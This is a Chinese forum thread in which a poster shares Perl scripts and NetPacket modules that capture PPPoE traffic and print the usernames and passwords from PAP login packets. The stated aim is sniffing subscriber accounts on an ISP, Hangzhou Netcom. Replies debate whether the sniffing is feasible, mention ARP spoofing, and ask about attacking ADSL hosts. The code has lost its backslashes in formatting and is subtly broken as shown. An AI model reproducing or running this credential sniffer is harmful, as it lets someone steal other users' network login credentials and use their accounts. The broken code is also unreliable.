用perl脚本sniff杭州网通pppoe帐号,学习截包,分析

angleeye

http://blog.china-pub.com/more.asp?name=angleeye&id=26175
用到的包可以从CPAN下载,

兰花仙子

偶觉得你应该把script贴到这里来，而不是引导大家去你的blog。

angleeye

1. 
   
2. +++++++++++++++++++++
   
3. +file pppoe_sniff.pl+
   
4. +++++++++++++++++++++
   
5. #!/usr/bin/perl
   
6. use strict;
   
7. use NetPacket::Ethernet;
   
8. use Net::Pcap qw(:functions);
   
9. use NetPacket::PPPOEHeader qw(:pppoe_const);
   
10. use NetPacket::PPPOEDiscovery qw(ETH_TYPE_PPPOE_DISCOVERY);
    
11. 
    
12. use constant ETH_TYPE_PPPOE_DISCOVERY => 0x8863;
    
13. use constant ETH_TYPE_PPPOE_SESSION => 0x8864;
    
14. 
    
15. my $bdebug = 0;
    
16. my($dev,$pcap_handle,$error_msg,$error_rtn,
    
17. $net,$mask,
    
18. $filter,$filter_str);
    
19. 
    
20. $dev="eth0";
    
21. $dev=$ARGV[0] if @ARGV==1;
    
22. print "opening device $dev n";
    
23. 
    
24. #get netmask
    
25. $error_rtn=Net::Pcap::lookupnet($dev,$net,$mask,$error_msg);
    
26. die "can not get the net mask of $devn$error_msgn"
    
27. unless $error_rtn != -1;
    
28. 
    
29. $pcap_handle=open_live($dev,1024,1,0,$error_msg);
    
30. die "can not open $dev to capture packets.n$error_msgn"
    
31. unless defined($pcap_handle);
    
32. print "begin capture packets on $devn";
    
33. 
    
34. #setup the capture filter, man tcpdump-expression for more detail info
    
35. #??seems useless
    
36. $filter="port 13";
    
37. $error_rtn=Net::Pcap::compile($pcap_handle,$filter,$filter_str,1,$mask);
    
38. die "failed to compile the filter.n$error_msgn"
    
39. unless $error_rtn != -1;
    
40. $error_rtn=Net::Pcap::setfilter($pcap_handle,$filter);
    
41. die "failed to set the filter.n$error_msgn"
    
42. unless $error_rtn != -1;
    
43. 
    
44. #install the ctrl_c interrupt function to end the loop
    
45. $SIG{"INT"}=&ctrl_c;
    
46. 
    
47. $error_rtn=loop($pcap_handle,-1,&process_packet,"");
    
48. #you may test the return value , -1 on error, -2 if t by pcap_breakloop
    
49. 
    
50. print "loop terminated.n";
    
51. 
    
52. pcap_close($pcap_handle);
    
53. 
    
54. #subroutings
    
55. 
    
56. #ctrl-c process
    
57. sub ctrl_c
    
58. {
    
59. print "ctrl_c pressed";
    
60. breakloop($pcap_handle);
    
61. }
    
62. 
    
63. #callback from pcap to process captured packets.
    
64. sub process_packet
    
65. {
    
66. my($ether, $pppoe);
    
67. my($user_data,$header,$packet)=@_;
    
68. if($bdebug)
    
69. {
    
70. print "................n";
    
71. print "$header->{tv_usec}t$header->{len}t$header->{caplen}n";
    
72. }
    
73. $ether=NetPacket::Ethernet->decode($packet);
    
74. if($bdebug)
    
75. {
    
76. print "0x$ether->{src_mac}t0x$ether->{dest_mac}t";
    
77. printf("0x%04xn",$ether->{type});
    
78. print "n";
    
79. }
    
80. #print "nParese packet...n";
    
81. #dump_ether($ether);
    
82. #process pppoe packet
    
83. if($ether->{type} == ETH_TYPE_PPPOE_DISCOVERY)
    
84. {
    
85. dump_ether($ether);
    
86. print "--------pppoe packet discovery stage----------n";
    
87. $pppoe=NetPacket::PPPOEDiscovery->decode($ether->{data});
    
88. $pppoe->dump();
    
89. print "n";
    
90. }
    
91. else
    
92. {
    
93. if($ether->{type} == ETH_TYPE_PPPOE_SESSION)
    
94. {
    
95. # print "--------pppoe packet session stage---------n" ;
    
96. $pppoe=NetPacket::PPPOEHeader->decode($ether->{data});
    
97. parse_ifis_PPP_PAP($pppoe->{data});
    
98. # $pppoe->dump();
    
99. # print "n";
    
100. }
     
101. }
     
102. #print "-----------------------------------------n";
     
103. }
     
104. sub dump_ether
     
105. {
     
106. my $self=shift;
     
107. print "----------dump ethernet frames info---------n";
     
108. printf("src_mac=%sndest_mac=%sn",
     
109. $self->{src_mac},$self->{dest_mac});
     
110. }
     
111. 
     
112. sub parse_ifis_PPP_PAP
     
113. {
     
114. my $data=shift;
     
115. my($ppp_proto);
     
116. 
     
117. ($ppp_proto,$data)=unpack("na*",$data);
     
118. #printf("ppp_protocol=%04xn",$ppp_proto);
     
119. if ($ppp_proto == 0xc023 )
     
120. {
     
121. my($code,$ident,$len);
     
122. my($user_name_len,$user_name,$user_password_len,$user_password);
     
123. my($pap_reply_len,$pap_reply);
     
124. #this is the PAP protocol
     
125. ($code,$ident,$len,$data)=unpack("CCna*",$data);
     
126. if($code == 0x01)
     
127. {
     
128. print "nauthenticate requestn";
     
129. ($user_name_len,$data)=unpack("Ca*",$data);
     
130. printf("user name length is %dn",$user_name_len);
     
131. ($user_name,$data)=
     
132. unpack("a".$user_name_len."a*",$data);
     
133. printf("user name is %sn",$user_name);
     
134. ($user_password_len,$data)=unpack("Ca*",$data);
     
135. printf("user password length is %dn",$user_password_len);
     
136. ($user_password,$data)=
     
137. unpack("a".$user_password_len."a*",$data);
     
138. printf("user password is %sn",$user_password);
     
139. }
     
140. if($code == 0x02 || $code == 0x03 )
     
141. {
     
142. print "nauthenticate replyn";
     
143. ($pap_reply_len,$data)=unpack("Ca*",$data);
     
144. printf("pap reply length is %dn",$pap_reply_len);
     
145. ($pap_reply,$data)=
     
146. unpack("a".$pap_reply_len."a*",$data);
     
147. printf("pap reply is n%sn",$pap_reply);
     
148. }
     
149. }
     
150. }
     
151. 
     
152. +++++++++++++++++++++++++++++++++
     
153. +file NetPackage::PPPOEHeader.pm+
     
154. +++++++++++++++++++++++++++++++++
     
155. package NetPacket::PPPOEHeader;
     
156. 
     
157. use strict;
     
158. use vars qw($VERSION @ISA @EXPORT @EXPORT_OK %EXPORT_TAGS);
     
159. use NetPacket;
     
160. 
     
161. BEGIN {
     
162. $VERSION="0.01";
     
163. @ISA = qw(Exporter NetPacket);
     
164. # Items to export into callers namespace by default
     
165. # (move infrequently used names to @EXPORT_OK below)
     
166. @EXPORT = qw(
     
167. );
     
168. # Other items we are prepared to export if requested
     
169. @EXPORT_OK = qw(PPPOE_CODE_PADI PPPOE_CODE_PADO
     
170. PPPOE_CODE_PADR PPPOE_CODE_PADS
     
171. PPPOE_CODE_PADT
     
172. );
     
173. # Tags:
     
174. %EXPORT_TAGS = (
     
175. ALL => [@EXPORT, @EXPORT_OK],
     
176. pppoe_const => [qw(PPPOE_CODE_PADI PPPOE_CODE_PADO
     
177. PPPOE_CODE_PADR PPPOE_CODE_PADS
     
178. PPPOE_CODE_PADT)]
     
179. );
     
180. }
     
181. 
     
182. use constant PPPOE_CODE_PADI => 0x09;
     
183. use constant PPPOE_CODE_PADO => 0x07;
     
184. use constant PPPOE_CODE_PADR => 0x19;
     
185. use constant PPPOE_CODE_PADS => 0x65;
     
186. use constant PPPOE_CODE_PADT => 0xa7;
     
187. 
     
188. sub decode {
     
189. my $class = shift;
     
190. my($pkt, $parent, @rest) = @_;
     
191. my $self = {};
     
192. 
     
193. # Decode PPPOE Header
     
194. if (defined($pkt)) {
     
195. my $tmp;
     
196. ($tmp,$self->{code},$self->{session_id},
     
197. $self->{pppoe_length},$self->{data})=unpack('CCnna*',$pkt);
     
198. $self->{version}=($tmp&0xf0)>>4;
     
199. $self->{type}=$tmp&0x0f;
     
200. }
     
201. 
     
202. bless $self,$class;
     
203. return $self;
     
204. }
     
205. sub dump
     
206. {
     
207. my $self = shift;
     
208. print "ndump PPPOE Header info ";
     
209. SWITCH: {
     
210. ($self->{code} == PPPOE_CODE_PADI ) && do {
     
211. print "PADIn"; last SWITCH; };
     
212. ($self->{code} == PPPOE_CODE_PADO ) && do {
     
213. print "PADOn"; last SWITCH; };
     
214. ($self->{code} == PPPOE_CODE_PADR ) && do {
     
215. print "PADRn"; last SWITCH; };
     
216. ($self->{code} == PPPOE_CODE_PADS ) && do {
     
217. print "PADSn"; last SWITCH; };
     
218. ($self->{code} == PPPOE_CODE_PADT ) && do {
     
219. print "PADTn"; last SWITCH; };
     
220. };
     
221. printf("version=%dttype=%dtcode=%dn",
     
222. $self->{version},$self->{type},$self->{code});
     
223. printf("session_id=%dtlength=%dn",
     
224. $self->{session_id},$self->{pppoe_length});
     
225. 
     
226. }
     
227. 
     
228. 1;
     
229. 
     
230. ++++++++++++++++++++++++++++++++
     
231. +file NetPacket::PPPOEDiscovery+
     
232. ++++++++++++++++++++++++++++++++
     
233. #!/usr/bin/perl;
     
234. package NetPacket::PPPOEDiscovery;
     
235. 
     
236. use strict;
     
237. 
     
238. use vars qw($VERSION @ISA @EXPORT @EXPORT_OK %EXPORT_TAGS);
     
239. use NetPacket;
     
240. use NetPacket::PPPOEHeader;
     
241. 
     
242. use constant ETH_TYPE_PPPOE_DISCOVERY => 0x8863;
     
243. 
     
244. BEGIN {
     
245. $VERSION="0.01";
     
246. @ISA = qw(Exporter NetPacket NetPacket::PPPOEHeader);
     
247. # Items to export into callers namespace by default
     
248. # (move infrequently used names to @EXPORT_OK below)
     
249. @EXPORT = qw(
     
250. );
     
251. # Other items we are prepared to export if requested
     
252. @EXPORT_OK = qw(
     
253. ETH_TYPE_PPPOE_DISCOVERY
     
254. );
     
255. # Tags:
     
256. %EXPORT_TAGS = (
     
257. ALL => [@EXPORT, @EXPORT_OK],
     
258. );
     
259. }
     
260. 
     
261. 
     
262. sub decode {
     
263. my $class = shift;
     
264. my ($pkt, $parent, @rest)=@_;
     
265. my $self;
     
266. 
     
267. # Decode PPPOE Discovery Packet
     
268. if (defined($pkt)) {
     
269. $self = NetPacket::PPPOEHeader::decode(
     
270. "NetPacket::PPPOEDiscovery",$pkt);
     
271. #parse TAG_VALUE
     
272. $self->parse_tag_value($self->{data});
     
273. }
     
274. 
     
275. return $self;
     
276. }
     
277. 
     
278. sub parse_tag_value{
     
279. my ($self,$pkt) = @_;
     
280. my @tags;
     
281. while(defined($pkt))
     
282. {
     
283. my %atag;
     
284. ($atag{tag_type},$atag{tag_length},
     
285. $pkt)=unpack('nna*',$pkt);
     
286. $atag{tag_value}="";
     
287. if($atag{tag_length}>0)
     
288. {
     
289. if($atag{tag_type} == 0x0102 ||
     
290. $atag{tag_type} == 0x0201 ||
     
291. $atag{tag_type} == 0x0202 ||
     
292. $atag{tag_type} == 0x0203 )
     
293. {
     
294. ($atag{tag_value}, $pkt)=
     
295. unpack("a".$atag{tag_length}."a*",$pkt);
     
296. }
     
297. else
     
298. {
     
299. ($atag{tag_value},$pkt)=
     
300. unpack('H'.2*$atag{tag_length}.'a*',$pkt);
     
301. }
     
302. }
     
303. push @tags,%atag;
     
304. }
     
305. $self->{tags}=@tags;
     
306. }
     
307. 
     
308. sub dump
     
309. {
     
310. my $self=shift;
     
311. $self->SUPER::dump();
     
312. print "----PPPOE::Discovery Stage----n";
     
313. printf("tag list:(?)n",@{$self->{tags}});
     
314. foreach my $ref_atag (@{$self->{tags}})
     
315. {
     
316. printf("tag_type=%04xttag_length=%dntag_value=%snn",
     
317. $ref_atag->{tag_type},
     
318. $ref_atag->{tag_length},
     
319. $ref_atag->{tag_value});
     
320. }
     
321. print "--------n";
     
322. }
     
323. 1;
     
324. 
     
325. +++++++++++++++++++++++++++++++++
     
326. +file NetPacket::PPPOESession.pm+
     
327. +++++++++++++++++++++++++++++++++
     
328. #!/usr/bin/perl;
     
329. package NetPacket::PPPOESession;
     
330. 
     
331. use strict;
     
332. 
     
333. use vars qw($VERSION @ISA @EXPORT @EXPORT_OK %EXPORT_TAGS);
     
334. use NetPacket;
     
335. use NetPacket::PPPOEHeader;
     
336. 
     
337. use constant ETH_TYPE_PPPOE_SESSION => 0x8864;
     
338. 
     
339. BEGIN {
     
340. $VERSION="0.01";
     
341. @ISA = qw(Exporter NetPacket NetPacket::PPPOEHeader);
     
342. # Items to export into callers namespace by default
     
343. # (move infrequently used names to @EXPORT_OK below)
     
344. @EXPORT = qw(
     
345. );
     
346. # Other items we are prepared to export if requested
     
347. @EXPORT_OK = qw(
     
348. ETH_TYPE_PPPOE_SESSION
     
349. );
     
350. # Tags:
     
351. %EXPORT_TAGS = (
     
352. ALL => [@EXPORT, @EXPORT_OK],
     
353. );
     
354. }
     
355. 
     
356. 
     
357. sub decode {
     
358. my $class = shift;
     
359. my ($pkt, $parent, @rest)=@_;
     
360. my $self;
     
361. 
     
362. # Decode PPPOE Discovery Packet
     
363. if (defined($pkt)) {
     
364. $self = NetPacket::PPPOEHeader::decode(
     
365. "NetPacket::PPPOE:Discovery",$pkt);
     
366. #parse TAG_VALUE
     
367. $self->parse_tag_value($self->{data});
     
368. }
     
369. 
     
370. return $self;
     
371. }
     
372. 
     
373. sub parse_tag_value{
     
374. my ($self,$pkt) = @_;
     
375. my @tags;
     
376. while(defined($pkt))
     
377. {
     
378. my %atag;
     
379. ($atag{tag_type},$atag{tag_length},
     
380. $pkt)=unpack('nna*',$pkt);
     
381. $atag{tag_value}="";
     
382. if($atag{tag_length}>0)
     
383. {
     
384. if($atag{tag_type} == 0x0102 ||
     
385. $atag{tag_type} == 0x0201 ||
     
386. $atag{tag_type} == 0x0202 ||
     
387. $atag{tag_type} == 0x0203 )
     
388. {
     
389. ($atag{tag_value}, $pkt)=
     
390. unpack("a".$atag{tag_length}."a*",$pkt);
     
391. }
     
392. else
     
393. {
     
394. ($atag{tag_value},$pkt)=
     
395. unpack('H'.2*$atag{tag_length}.'a*',$pkt);
     
396. }
     
397. }
     
398. push @tags,%atag;
     
399. }
     
400. $self->{tags}=@tags;
     
401. }
     
402. 
     
403. sub dump
     
404. {
     
405. my $self=shift;
     
406. $self->SUPER::dump();
     
407. print "----PPPOE::Discovery Stage----n";
     
408. printf("tag list:(?)n",@{$self->{tags}});
     
409. foreach my $ref_atag (@{$self->{tags}})
     
410. {
     
411. printf("tag_type=%04xttag_length=%dntag_value=%snn",
     
412. $ref_atag->{tag_type},
     
413. $ref_atag->{tag_length},
     
414. $ref_atag->{tag_value});
     
415. }
     
416. print "--------n";
     
417. }
     
418. 1;
     

复制代码

[ 本帖最后由 angleeye 于 2005-11-22 22:40 编辑 ]

兰花仙子

你要编辑下，选择"禁用Smilies"哦

对了，挺好的

apile

不错....改天用linux连上pppoe的时候再试...
activePerl我不会用..

wwrko

老兄,首先从原理上讲,别人的流量会从你这里过么?

怒剑狂啸

可以的，arp欺骗！

怒剑狂啸

sorry，pppoe不了解！

wwrko

晕,楼上的. ppp是点到点的协议. 加密就算了.没加密也要像80年代侦探片里一样在别人线路上接两根线去侦听.oe要好一点.如果是pppoe+adsl那也没戏.如果是oe+ethernet,基本上isp会每个端口设一个vlan.总而言之,你是啥也侦听不到.如果client端能在二层通信,isp还怎么混

af80

问一个问题：ADSL拨号上网的话，有公网地址的吧？如果别人知道这个公网地址，可不可以攻击呢？